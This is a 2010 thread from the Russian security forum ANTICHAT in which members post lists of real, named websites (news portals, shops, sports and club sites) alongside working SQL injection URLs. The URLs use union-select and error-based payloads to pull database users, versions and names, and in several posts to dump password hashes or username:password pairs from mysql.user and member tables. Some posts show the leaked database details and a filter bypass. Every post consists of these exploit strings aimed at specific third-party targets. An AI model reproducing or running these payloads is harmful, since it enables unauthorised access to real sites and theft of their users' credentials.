HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #13391  
Старый 30.10.2010, 23:19
Lasteeck
Познающий
Регистрация: 05.04.2010
Сообщений: 30
Провел на форуме:
151946

Репутация: 2
По умолчанию

http://www.tradegrupp.ru/news.php?nid=25+and+1=0+union+select+1,concat_ws%2 80x3a,user,password%29,3,4,5,6+from+mysql.user+lim it+1,1--
 
Ответить с цитированием

  #13392  
Старый 31.10.2010, 03:10
~d0s~
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279

Репутация: 55
По умолчанию

medpoisk.ru

Тиц 650

PR 5


Код:
Code:
http://www.medpoisk.ru/catalog_view.php?region_id=-2+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4--
fmjd.org

Тиц 110

PR 5


Код:
Code:
http://fmjd.org/news.php?nid=-421+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10--
mzma.net

Тиц 120

PR 1


Код:
Code:
http://www.mzma.net/club/articles/read.php?id=-100+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6--
irsp.org.pk

PR 4

Код:
Code:
http://irsp.org.pk/news.php?nid=-15+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6--
 
Ответить с цитированием

  #13393  
Старый 31.10.2010, 03:27
brutos
Новичок
Регистрация: 25.11.2009
Сообщений: 0
Провел на форуме:
68379

Репутация: 0
По умолчанию

http://www.hometrend.ca/product.php?productId=83&catId=-0102'+union+select+1,concat_ws(0x3a3a,version(),us er(),database())+--+

http://www.utmsports.com/athlete.cfm?id=-1057+union+select+1,2,3,4,5,6,concat_ws(0x3a3a,ver sion(),@@version_compile_os,user(),database()),8,9 ,10,11,12,13,14,15+--+
 
Ответить с цитированием

  #13394  
Старый 31.10.2010, 05:41
Unknown
Guest
Сообщений: n/a
Провел на форуме:
51225

Репутация: 23
По умолчанию

http://www.corfida.org/index.php?id=-5+union+select+unhex(hex(concat_ws(0x3a,0x78,datab ase(),user(),version())))/*

Database: corfida_org_-_cms

User: corfida_@localhost

Version: 4.1.22



http://www.eurobirding.com/birdingmagazines/artinfo.php?id=-9142+union+select+concat_ws(0x3a,database(),user() ,version())+--+


Database: eurobirdingcom01

User: eurobirdingcom01@87.238.248.116

Version: 5.0.90-log

http://www.aoecs.org/news/news.php?id=-41+/*!and*/1=2+/*!union*/select/*!1,2,concat_ws(0x3a,database(),user(),version()), 4,5,6,7,8*/+--+


Database: aoecs_current

User: aoecs_aoecs@localhost

Version: 5.1.50

Стоит фильтр.Но обходится довольно таки легко.
 
Ответить с цитированием

  #13395  
Старый 31.10.2010, 14:11
~d0s~
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279

Репутация: 55
По умолчанию

sayitontheweb.com

PR 5

Код:
Code:
http://www.sayitontheweb.com/~smith/projectdetails.php?id=-26+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32--
allanhouser.com

PR 5

Код:
Code:
http://www.allanhouser.com/newsDetail.php?id=-21+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8--
southernpowerlifting.com

PR 3

Код:
Code:
http://www.southernpowerlifting.com/contest_results.php?id=-121+union+select+1,2,3,concat_ws(0x3a,user(),database(),version())--
feicuidao.com

PR 4

Код:
Code:
http://www.feicuidao.com/jqzx_look.php?id=-11+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,1
cyberspacesupport.com

PR 3

Код:
Code:
http://www.cyberspacesupport.com/question.php?question_id=-15681+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9--
 
Ответить с цитированием

  #13396  
Старый 31.10.2010, 14:48
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660

Репутация: 1148
По умолчанию

pr4 тиц90

http://www.leohao.ru/main.php?lang=en%27%20and%200%20union%20select%201 ,2,3,4,'5',6,7,8,9%23

http://www.leohao.ru/main.php?lang=en%27%20and%200%20union%20select%201 ,2,3,4,0x27,6,7,8,9%23 -> 2-d order inj.
 
Ответить с цитированием

  #13397  
Старый 31.10.2010, 14:58
Чакэ
Guest
Сообщений: n/a
Провел на форуме:
90728

Репутация: 62
По умолчанию

Код HTML:
HTML:
http://www.lpb-company.ru/enc/?igla=-1+union+select+all+1,2,3,table_name,column_name,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+information_schema.columns+order+by+1+desc+limit+0,1+--+
 
Ответить с цитированием

  #13398  
Старый 31.10.2010, 19:56
moodoone
Новичок
Регистрация: 21.10.2009
Сообщений: 27
Провел на форуме:
815635

Репутация: 16
Отправить сообщение для moodoone с помощью ICQ
По умолчанию

Я вернулся после небольшой паузы)

Код:
Code:
http://www.beigbeder.net/pages/livre.php?id=1-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12--
Код:
Code:
http://www.les-racines-du-ciel.com/boutiques.php?num=87-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
Код:
Code:
http://paroles.webfenua.com/chanson.php?id=2233-999.9+union+select+1,2,user%28%29,4--
 
Ответить с цитированием

  #13399  
Старый 31.10.2010, 19:58
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

http://concursos.colombiaaprende.edu.co/expediciones_botanicas/ver_reverdecimiento.php?id=274+group+by+concat(ver sion(),floor(rand(0)*2))having+min(0)+or+1--

http://www.verdadcolombia.org/archivos/VerDocumento.php?Id=11+and+1=0+union+select+1,2,3, 4,5,group_concat(user,char(58),pass)+from+user_seg
 
Ответить с цитированием

  #13400  
Старый 31.10.2010, 21:10
brutos
Новичок
Регистрация: 25.11.2009
Сообщений: 0
Провел на форуме:
68379

Репутация: 0
По умолчанию

http://www.sdintlgroup.net/properties-info.php?id=56+union+select+1,2,version(),concat_w s(0x3a,id,username,password),5,6,7,8,9,10,11,12+fr om+members+limit+0,1

http://www.vfdnet.de/verband/nordrhein-westfalen/index.php?verbandid=9&info_id=4231'+or+1+group+by+ concat(concat_ws(0x3a3a,version(),@@version_compil e_os,user(),database()),floor(rand(0)*2))having+mi n(0)+or+1+--+

http://www.westgold.de/html/info.php?id=105+and+1=2+union+select+1,version(),3 ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24+--+

http://www.sportklettern-hessen.de/home/info.php?id=-185+union+select+1,2,3,concat_ws(0x3a3a,version(), @@version_compile_os,user(),database()),5,6,7+--+

http://www.divid-pro.de/product_info.php?id_product=-3+union+select+1,2,version(),4,5,@@version_compile _os,7,concat(user(),0x3a3a,database()),9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31,32

http://www.campaignsitebuilder.com/templates/displayfiles/Tmpl13.asp?siteid=524&pageid=8510&trial=false&blog id=338-999.9+union+select+@@version,2,3,4,5,6,7,8,9,10--

http://www.flvwdialog.de/php/db/info.php?id=-5711+union+select+1,2,3,4,5,6,7,8,concat(@i:=0x00, @o:=0x0d0a,benchmark(977,@o:=CONCAT(@o,0x0d0a,(SEL ECT @i:=concat(BenutzerID,0x3a,Benutzername,0x3a,Passw ort,0x0a7c) from us_benutzer where BenutzerID>@i order by BenutzerID LIMIT 1))),@o),10,11,12,13,14,15,16,17,18,19,20,21,22,23 ,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,4 0,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56, 57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73 ,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,9 0+--+
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ